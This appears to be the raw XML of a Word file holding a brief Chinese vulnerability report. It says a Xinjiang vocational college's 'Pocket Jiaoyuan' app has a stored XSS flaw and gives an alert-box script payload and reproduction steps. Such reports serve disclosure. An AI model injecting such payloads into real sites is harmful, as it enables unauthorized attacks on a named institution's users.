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B8BFC6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B8BFC6"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>新疆交通职业技术学院-口袋交院存在存储型XSS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B8BFC6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B8BFC6"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>归属：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B8BFC6"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="monospace" w:hAnsi="monospace" w:eastAsia="monospace" w:cs="monospace"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="B8BFC6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7715250" cy="80010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B8BFC6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B8BFC6"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>漏洞复现：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B8BFC6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B8BFC6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5619750" cy="64770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B8BFC6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B8BFC6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6477000" cy="762952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B8BFC6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B8BFC6"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">输入payload： </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)" w:eastAsia="var(--monospace)" w:cs="var(--monospace)"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="B8BFC6"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;script&gt;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B8BFC6"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>alert('xss')&lt;/script&gt;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B8BFC6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B8BFC6"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>重新点击我的大学即可弹窗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B8BFC6"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="monospace" w:hAnsi="monospace" w:eastAsia="monospace" w:cs="monospace"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="B8BFC6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10020300" cy="577215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hYWQ3MWQ1MjQyZmFlMTAwNmNmYjFmZGVlMDZlMzcifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="4A7C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</Words>
  <Characters>82</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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2023-01-09T03:19:17Z</dcterms:created>
  <dc:creator>xuanqaq</dc:creator>
  <cp:lastModifiedBy>听说</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-01-09T03:19:28Z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2560B9BF6D654DAFB6A8FD5D2948C4E7</vt:lpwstr>
  </property>
</Properties>
</file>